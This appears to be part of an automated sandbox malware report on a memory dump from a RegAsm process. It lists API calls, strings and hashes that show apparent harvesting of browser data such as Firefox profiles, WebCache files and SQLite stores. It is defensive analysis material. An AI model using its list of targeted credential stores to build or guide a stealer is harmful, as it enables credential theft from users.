                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                  • free.MSVCRT ref: 0041848B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorFileLastfree
                                                                                  • String ID: |A
                                                                                  • API String ID: 981974120-1717621600
                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                  APIs
                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                  • String ID: $0.@
                                                                                  • API String ID: 2758756878-1896041820
                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 2941347001-0
                                                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcscat$wcscpywcslen
                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                  • API String ID: 2489821370-1174173950
                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 669240632-0
                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                  APIs
                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                  • String ID: "%s"
                                                                                  • API String ID: 1343145685-3297466227
                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                  • API String ID: 1714573020-3385500049
                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                  • memset.MSVCRT ref: 00408828
                                                                                  • memset.MSVCRT ref: 00408840
                                                                                  • memset.MSVCRT ref: 00408858
                                                                                  • memset.MSVCRT ref: 00408870
                                                                                  • memset.MSVCRT ref: 00408888
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 2911713577-0
                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                  APIs
                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcmp
                                                                                  • String ID: @ $SQLite format 3
                                                                                  • API String ID: 1475443563-3708268960
                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmpqsort
                                                                                  • String ID: /nosort$/sort
                                                                                  • API String ID: 1579243037-1578091866
                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Strings
                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                  • API String ID: 3354267031-2114579845
                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                  APIs
                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                  APIs
                                                                                  Strings
                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                  • API String ID: 2221118986-1725073988
                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                  APIs
                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@DeleteObject
                                                                                  • String ID: r!A
                                                                                  • API String ID: 1103273653-628097481
                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                  APIs
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@
                                                                                  • String ID:
                                                                                  • API String ID: 1033339047-0
                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                  APIs
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$memcmp
                                                                                  • String ID: $$8
                                                                                  • API String ID: 2808797137-435121686
                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                  APIs
                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                  • String ID:
                                                                                  • API String ID: 1979745280-0
                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                  APIs
                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProcVersionmemsetwcscpy
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                  • API String ID: 4182280571-2036018995
                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                  APIs
                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
